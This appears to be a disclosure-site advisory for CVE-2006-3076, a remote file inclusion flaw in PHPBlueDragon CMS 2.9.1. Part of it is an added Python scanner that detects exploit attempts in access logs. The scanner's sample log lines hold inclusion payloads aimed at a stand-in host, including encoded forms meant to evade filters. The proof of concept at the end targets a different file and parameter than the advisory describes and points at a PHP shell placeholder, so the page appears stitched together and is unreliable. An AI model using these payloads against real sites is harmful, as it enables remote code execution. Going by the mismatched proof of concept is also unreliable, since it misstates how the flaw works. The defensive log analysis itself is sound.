DEFTCODE( 2 )

GPG - 2048R/6D378CAF

CVE-2006-3076 – PHPBlueDragon CMS 2.9.1 - Remote File Inclusion

Vendor

http://phpbluedragon.net/

PHP Blue Dragon CMS is a web-based content management system implemented in PHP.

Description

PHP remote file inclusion vulnerability in software_upload/public_includes/pub_templates/vphptree/template.php in PHPBlueDragon CMS 2.9.1 allows remote attackers to execute arbitrary PHP code via a URL in the vsDragonRootPath parameter.
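A log check for the request pattern described above, as an added example that is not part of the original advisory or the vendor's code. It assumes a common/combined access-log format; the sample lines, addresses and the `example.invalid` host are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

PARAM = "vsdragonrootpath"  # parameter named in the advisory, lower-cased
# URL schemes / PHP stream wrappers that make an include path non-local.
REMOTE = re.compile(r"^\s*(?:(?:https?|ftps?|php|data|expect|phar)\s*:|//)", re.I)
# Assumption: common/combined log format: client ... "METHOD target HTTP/x" status
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

TEMPLATE = "/software_upload/public_includes/pub_templates/vphptree/template.php"
# Constructed sample lines (documentation IP ranges, example.invalid host).
SAMPLE_LOG = [
    f'192.0.2.10 - - [12/Jun/2006:10:01:02 +0000] "GET {TEMPLATE}'
    '?vsDragonRootPath=http://example.invalid/x.txt? HTTP/1.1" 200 512',
    f'198.51.100.7 - - [12/Jun/2006:10:03:40 +0000] "GET {TEMPLATE}'
    '?vsdragonrootpath=%2568ttps%253A%252F%252Fexample.invalid%252Fy HTTP/1.1" 200 498',
    '192.0.2.20 - - [12/Jun/2006:10:04:11 +0000] "GET /index.php?page=news HTTP/1.1" 200 2048',
    f'192.0.2.21 - - [12/Jun/2006:10:05:00 +0000] "GET {TEMPLATE}'
    '?vsDragonRootPath=./ HTTP/1.1" 200 300',
]

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %2568ttp) used to slip past filters."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_value(target):
    """Return the decoded parameter value if it names a remote resource, else None."""
    # parse_qsl already decodes one layer; fully_decode removes any further layers.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if fully_decode(name).lower() == PARAM:
            value = fully_decode(value)
            if REMOTE.match(value):
                return value
    return None

def scan(lines):
    """Return (client, status, decoded value) for every matching log line."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if m and (value := suspicious_value(m.group(2))) is not None:
            hits.append((m.group(1), m.group(3), value))
    return hits

if __name__ == "__main__":
    for client, status, value in scan(SAMPLE_LOG):
        print(f"{client} status={status} {PARAM} -> {value}")
```

Access logs normally record only the query string, so values sent in a POST body are not visible to this check.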

Proof of Concept

~ stands for [php-shell-url]

  1. http://localhost/shop/page.php?osCsid= ~

References